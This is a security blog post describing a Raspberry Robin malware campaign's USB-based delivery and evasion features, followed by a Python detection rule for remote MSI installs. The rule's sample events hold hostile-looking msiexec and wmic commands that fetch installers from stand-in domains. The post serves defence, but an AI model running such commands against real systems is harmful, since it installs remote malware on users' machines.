Researchers at Trend Micro recently reported on a new Raspberry Robin campaign, tracked by Microsoft as Dev-0856, that has primarily attacked telecommunications and government office systems in Argentina, Australia, Mexico, Croatia, Italy, Brazil, France, India, and Colombia since September 2022. The malware has been increasingly deployed by a wide variety of threat groups as a loader to deliver payloads, including ransomware such as LockBit and Clop.
The primary attack vector has been infected USB drives that download a malicious MSI installer file, which in turn deploys the primary payload; either msiexec.exe or wmic.exe is used as the trusted installer. Some USB drives carry a configured autorun.inf file that runs the payload automatically, whereas others rely on social engineering to entice the targeted user into clicking an associated .LNK file. The payload loader now deploys a decoy adware named BrowserAssistant to confuse detection and analysis efforts, and adds advanced anti-sandbox, anti-analysis, and obfuscation features, including six layers of packing.
Organizations can defend against this threat by monitoring or restricting the use of USB drives. User education to avoid unsolicited USB drives, or drives from untrusted sources, is a key administrative security control. In addition, the malware has a number of features that lend themselves to custom detections built on an organization's unique baseline of activity. For example, Raspberry Robin typically uses the Tor network for C2 after installation and, as noted above, typically deploys a rogue MSI installer file that connects out to a domain in order to evade defenses; both behaviours stand out against a baseline of normal installer and network activity. Binary Defense's Threat Hunting services can assist with this type of defense-in-depth approach.
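As an added illustration of the custom-detection idea above (example code, not from Trend Micro, Microsoft or Binary Defense), the Python below hunts process-creation telemetry for msiexec.exe or wmic.exe being handed a remote URL, which is the rogue-MSI-from-a-domain pattern the post describes. The Sysmon-style field names are an assumption about the telemetry source, and the sample events are constructed, not real captures.

```python
import re
from urllib.parse import urlparse

# Trusted installer binaries named in the post as the delivery mechanism.
INSTALLER_IMAGES = ("msiexec.exe", "wmic.exe")
# A remote package location in the command line is the signal; a local
# .msi path is ordinary administrative activity and is not flagged.
URL_RE = re.compile(r"https?://[^\s\"']+", re.IGNORECASE)
# Unattended-install switches make a remote install more suspicious.
QUIET_RE = re.compile(r"(?<![\w/])/(?:q[nb]?|quiet)\b", re.IGNORECASE)

# Constructed Sysmon Event ID 1 style records (field names are an assumption).
SAMPLE_EVENTS = [
    {"Image": r"C:\Windows\System32\msiexec.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": r'msiexec.exe /q /i "http://loader.example.invalid/setup.msi"'},
    {"Image": r"C:\Windows\System32\wbem\WMIC.exe",
     "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r"wmic.exe product call install PackageLocation=https://cdn.example.invalid/a.msi"},
    {"Image": r"C:\Windows\System32\msiexec.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": r'msiexec.exe /i "C:\Users\alice\Downloads\vendor-tool.msi" /qn'},
    {"Image": r"C:\Windows\System32\cmd.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": r"cmd.exe /c echo http://intranet.example.invalid"},
]

def image_name(path):
    """Lower-cased file name of an Image/ParentImage path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()

def detect_remote_msi_install(events):
    """One finding per event where msiexec.exe or wmic.exe receives a remote URL.
    The extracted domain feeds blocklists or enrichment; quiet switches raise severity."""
    findings = []
    for ev in events:
        if image_name(ev.get("Image", "")) not in INSTALLER_IMAGES:
            continue
        cmd = ev.get("CommandLine", "")
        urls = URL_RE.findall(cmd)
        if not urls:
            continue  # local package path: not the pattern described in the post
        findings.append({
            "image": image_name(ev["Image"]),
            "parent": image_name(ev.get("ParentImage", "")),
            "domain": urlparse(urls[0]).hostname,
            "severity": "high" if QUIET_RE.search(cmd) else "medium",
        })
    return findings

if __name__ == "__main__":
    for finding in detect_remote_msi_install(SAMPLE_EVENTS):
        print(finding)
```

Tune the parent-process and domain fields against your own baseline: a software-deployment service launching msiexec.exe against an internal repository is expected, while explorer.exe or cmd.exe launching it against an unfamiliar external domain is what this rule is meant to surface.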